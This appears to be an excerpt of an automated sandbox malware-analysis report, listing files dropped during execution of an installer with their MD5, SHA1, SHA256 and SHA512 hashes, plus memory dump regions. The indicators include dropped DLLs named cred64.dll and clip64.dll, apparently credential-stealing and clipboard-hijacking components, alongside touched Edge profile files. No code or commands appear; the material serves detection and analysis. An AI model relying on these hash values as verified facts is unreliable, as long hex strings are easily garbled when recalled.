C:\Users\Admin\AppData\Local\Temp\is-BP7RS.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

memory/4784-411-0x0000000004C30000-0x0000000004C3A000-memory.dmp

memory/4784-412-0x0000000004C50000-0x0000000004C58000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 17bf4f77a7509da6e6b9e1071333b87b
SHA1 38975587dde1db7d2512d86745fc61dc05fc3ee5
SHA256 9a0c38cf3371608ef0c32c30d08aaaca5a3e1d3d6ca2fdb53adfa9371f8066d8
SHA512 98405958e9b0985f353667d354ae956a85447686f846d40d82aab87fe4c7d86cf52ef117084b65c63d0324376e526ae3621749c4cbc57011cae237949d3dd406

C:\Users\Admin\AppData\Local\Temp\is-BP7RS.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp

MD5 e416b5593ef10377e8edc748ca6f2527
SHA1 d06fb79becff1bedd80f1b861449c8665af9aa67
SHA256 a7e400b62721851753ec6453e7eb3a5df4797149cfa1d3b0bf9db0a837863eb0
SHA512 8e44b491f86779ab5a6834da0639952be11d6ab598f392cee28ed5dabd71b3b15330d872620c1d0d858024e0e09d81ab0f9addbde82c1695de22d0bdf8f5be7c

memory/4268-287-0x0000000000400000-0x0000000000434000-memory.dmp

memory/4784-284-0x0000000004E00000-0x0000000004E9C000-memory.dmp

memory/3076-433-0x0000000000400000-0x00000000004BA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3e12a950138959e9966e54b5b211bd99
SHA1 c5c3a48cb78ab44fd8fd41f5be5017504c781441
SHA256 118487b4e4acc9fb9742ccf60d63ed18b384688183416c98e3e8969fa078fc97
SHA512 6ba8442fe0713a77c827764dc67a9b9d22c326a390ace91f0ed76f5dee888f94313aeab87938a5ff4e04fed1a85d70703454a5eaa823bdd5f8d430d3aee0d073

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe593445.TMP

MD5 9f096582052ea4c2ab71886cf2e9194f
SHA1 bc03c2aa189c3576a9731eb08c152a11dd33837b
SHA256 94e9f83643e1c26e51bba131b6d68145e437cc133f945869f99d972d838ad093
SHA512 52ae402d13a8b6dc816c64a904ee44fa73d1244f60efb4cfe0cf0bfc6d4b710574d58eaf3b62fe523171fd70cd29ef4f712a37baecdfd92326e01e181961d1b6

memory/4784-277-0x0000000072FB0000-0x0000000073760000-memory.dmp

memory/4388-262-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 55447f754ed036c9ea0019c5b58206bd
SHA1 e5066619176a8cbb6743d87cee2a2fb9a2926dd6
SHA256 4a14afe4a03293e8abb10967647f48b6b3b00fdc6f966715f338269945da95e6
SHA512 2d2a8a01cc6dd0efcfc3a6672f284665d933607c2f8bbdd85a96417e0088675142823c441c0c85735a8a8d517fdd9433061173a5b4a22d70273821fbf6821ccc

memory/4784-434-0x0000000005040000-0x00000000051D2000-memory.dmp

memory/1900-436-0x0000000072FB0000-0x0000000073760000-memory.dmp

memory/4784-441-0x0000000005030000-0x0000000005040000-memory.dmp

memory/4784-440-0x0000000005030000-0x0000000005040000-memory.dmp

memory/4784-442-0x0000000005030000-0x0000000005040000-memory.dmp

memory/1900-443-0x0000000007FA0000-0x0000000007FB0000-memory.dmp

memory/4784-445-0x0000000005030000-0x0000000005040000-memory.dmp

memory/4784-446-0x0000000005030000-0x0000000005040000-memory.dmp

memory/4784-444-0x0000000004FC0000-0x0000000004FD0000-memory.dmp

memory/4784-447-0x0000000005030000-0x0000000005040000-memory.dmp

memory/4908-452-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4908-456-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4908-459-0x0000000000400000-0x000000000041B000-memory.dmp

memory/752-470-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5584-471-0x0000000000400000-0x0000000000636000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vsalkb3i.smm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/752-545-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5584-546-0x0000000000400000-0x0000000000636000-memory.dmp

memory/3956-575-0x00007FF71A0A0000-0x00007FF71A641000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 63b301927b6a4239c88e47bf445afc3b
SHA1 404977ba52ca98965232e182bfda820f5f122a31
SHA256 e1cf343759bea6643dcfcd5d8b2f1ba8954dfd7565b153f8446927e4961211ef
SHA512 79aafbb350b79eae4f59361487ee1c5aa0c6360c6429605011ce17f4cbce5a9e5c88be37f1d5e214cb846464d3942b2d083a2ace784a1dc9670eee17f1db0eff

memory/3956-604-0x00007FF71A0A0000-0x00007FF71A641000-memory.dmp

memory/752-608-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5584-609-0x0000000000400000-0x0000000000636000-memory.dmp

memory/6028-672-0x00007FF6E4DC0000-0x00007FF6E5361000-memory.dmp

memory/752-673-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5584-674-0x0000000000400000-0x0000000000636000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 790049b6cabe6d95399be487df0d0de6
SHA1 c4a39110d0b5b823839419378ddc6f6819c8893d
SHA256 928e4393e5f90eae9f0e5bec4865459c4a895a96b43390ed79d2eecacb493501
SHA512 4c3de667eae6fdb6c10cefd431353a65c80d7a47266a2ffa6f9be6b186a16fa3ae9258b3974fed3810403f59a4e0036868f6f2f60456970d46a49ea3add8737e

memory/3620-692-0x00007FF6255A0000-0x00007FF625906000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 70f69a71c63d7df5c328363014f26c96
SHA1 2ad9bb3c127e87186c6714435888639f12bf0cc5
SHA256 664a027b2f676f1cf59f9c8221dd0993afa632ed31fa051541d87f5d37bf5fa7
SHA512 18395f9a1cb1b19118f614189ead0e29e6bc2d0dd2a92c2583d9eea6ea4814cd07e1725b5776bfd3d45bf1a23c69c091ee78e0e9e300c66198563100b936e8df

memory/752-734-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5584-735-0x0000000000400000-0x0000000000636000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 7bdcdb7daca381acb8ec29f4c741e524
SHA1 7782c01f4e695c657fde8d5500a1b76747d4b1d9
SHA256 4a4cad7e1c83e41dd4f82c82422457ae8c45e7ea3446b232a21fc21209c7d806
SHA512 40b06e7e7238f3cf5ac8527db5feacbb604afc8347b682dbd813cd260114dcbe71205981299c13faf41dc62f22d01ac322998db30f3c08ef0618bfb4c9d1d645

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 d9ad0ba1ff90ce78a5be289d9d9f1f11
SHA1 f1449633c8510625b15422c537ee26b7fd73277e
SHA256 98cfdfc819da251e58095fc44f0a84d9a731f5d69f70b357c1ebd516293bc011
SHA512 0a0e171d3b016b4a662ec7b7aea3a545b5fc188de9ebaa06131af645657c79d58a8291d830f8f70b0487a092091031709a7a14511619ed4841a9ee144bf34ee9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 51fc25e26185d02864ba239dc0f07018
SHA1 125095b46a292f8d74499b5c7c260d6c859a2c41
SHA256 498ee10124918b10e65d2458195372ce7e36bf36ca1ae06ffc0c5f7fa1473bf6
SHA512 698b7726d2c431dcaab984fb49dcd787483761ee7105b1d7a8e5db0fc9fb05aa5b707ac966119b222d56fa3a8b764222dca38aeb25734d331bb1b955fbb010d6